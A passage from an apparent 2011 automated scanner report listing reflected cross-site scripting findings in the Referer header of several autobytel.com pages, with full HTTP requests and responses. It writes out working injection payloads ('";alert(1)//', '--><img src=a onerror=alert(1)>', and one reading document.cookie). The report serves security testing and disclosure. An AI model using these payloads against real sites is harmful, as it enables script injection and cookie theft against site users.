<img src=a onerror=alert(1)>22eba66e9cd -->
...[SNIP]...

4.1894. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d81f"%3balert(1)//3dfa9812b5a was submitted in the Referer HTTP header. This input was echoed as 7d81f";alert(1)//3dfa9812b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:52 GMT
Content-Length: 22255
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7d81f%22%3Balert%281%29%2F%2F3dfa9812b5a;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~7d81f";alert(1)//3dfa9812b5a";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "486F944D-9E1F-99F6-CC3A9C83
...[SNIP]...

4.1895. http://www.autobytel.com/auto-insurance-quotes.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload fc74a--><img%20src%3da%20onerror%3dalert(1)>d60633d14d1 was submitted in the Referer HTTP header. This input was echoed as fc74a--><img src=a onerror=alert(1)>d60633d14d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fc74a--><img%20src%3da%20onerror%3dalert(1)>d60633d14d1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:33 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efc74a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed60633d14d1;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>d60633d14d1 -->
...[SNIP]...

4.1896. http://www.autobytel.com/auto-insurance-quotes.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e29b9"%3balert(1)//723a49350c8 was submitted in the Referer HTTP header. This input was echoed as e29b9";alert(1)//723a49350c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33737
Expires: Mon, 24 Jan 2011 23:57:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:18 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:17 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ee29b9%22%3Balert%281%29%2F%2F723a49350c8;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~e29b9";alert(1)//723a49350c8";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48981BAA-0570-157C-F6520A26
...[SNIP]...

4.1897. http://www.autobytel.com/car-advice.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58fb1"%3balert(1)//f762c262f48 was submitted in the Referer HTTP header. This input was echoed as 58fb1";alert(1)//f762c262f48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=58fb1"%3balert(1)//f762c262f48

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43851
Expires: Mon, 24 Jan 2011 23:57:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:02 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E58fb1%22%3Balert%281%29%2F%2Ff762c262f48;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~58fb1";alert(1)//f762c262f48";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4895AC58-A8F6-90D6-8B8F168B
...[SNIP]...

4.1898. http://www.autobytel.com/car-advice.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c62ef--><img%20src%3da%20onerror%3dalert(1)>8fc335ce01b was submitted in the Referer HTTP header. This input was echoed as c62ef--><img src=a onerror=alert(1)>8fc335ce01b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:59:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:59:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:59:39 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ec62ef%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8fc335ce01b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>8fc335ce01b -->
...[SNIP]...

4.1899. http://www.autobytel.com/car-blog.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 174c5--><img%20src%3da%20onerror%3dalert(1)>1dccc386485 was submitted in the Referer HTTP header. This input was echoed as 174c5--><img src=a onerror=alert(1)>1dccc386485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=174c5--><img%20src%3da%20onerror%3dalert(1)>1dccc386485

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:35 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E174c5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E1dccc386485;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>1dccc386485 -->
...[SNIP]...

4.1900. http://www.autobytel.com/car-blog.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc9a7"%3balert(1)//2128de599ac was submitted in the Referer HTTP header. This input was echoed as cc9a7";alert(1)//2128de599ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:21 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecc9a7%22%3Balert%281%29%2F%2F2128de599ac;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~cc9a7";alert(1)//2128de599ac";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48B3F66F-07B4-1292-99ED2518
...[SNIP]...

4.1901. http://www.autobytel.com/car-dealers.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b925"%3balert(1)//7f41c8730bc was submitted in the Referer HTTP header. This input was echoed as 5b925";alert(1)//7f41c8730bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=5b925"%3balert(1)//7f41c8730bc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:40 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E5b925%22%3Balert%281%29%2F%2F7f41c8730bc;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~5b925";alert(1)//7f41c8730bc";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48DBB291-F863-7FBA-A6F0FF79
...[SNIP]...

4.1902. http://www.autobytel.com/car-dealers.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d824a--><img%20src%3da%20onerror%3dalert(1)>c54ae44041b was submitted in the Referer HTTP header. This input was echoed as d824a--><img src=a onerror=alert(1)>c54ae44041b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:47 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:47 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed824a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ec54ae44041b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>c54ae44041b -->
...[SNIP]...

4.1903. http://www.autobytel.com/car-financing.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93624--><img%20src%3da%20onerror%3dalert(1)>a406ae0398d was submitted in the Referer HTTP header. This input was echoed as 93624--><img src=a onerror=alert(1)>a406ae0398d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=93624--><img%20src%3da%20onerror%3dalert(1)>a406ae0398d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:41 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E93624%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ea406ae0398d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>a406ae0398d -->
...[SNIP]...

4.1904. http://www.autobytel.com/car-financing.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487a"%3balert(1)//fd21207da5d was submitted in the Referer HTTP header. This input was echoed as 4487a";alert(1)//fd21207da5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:29 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4487a%22%3Balert%281%29%2F%2Ffd21207da5d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41521

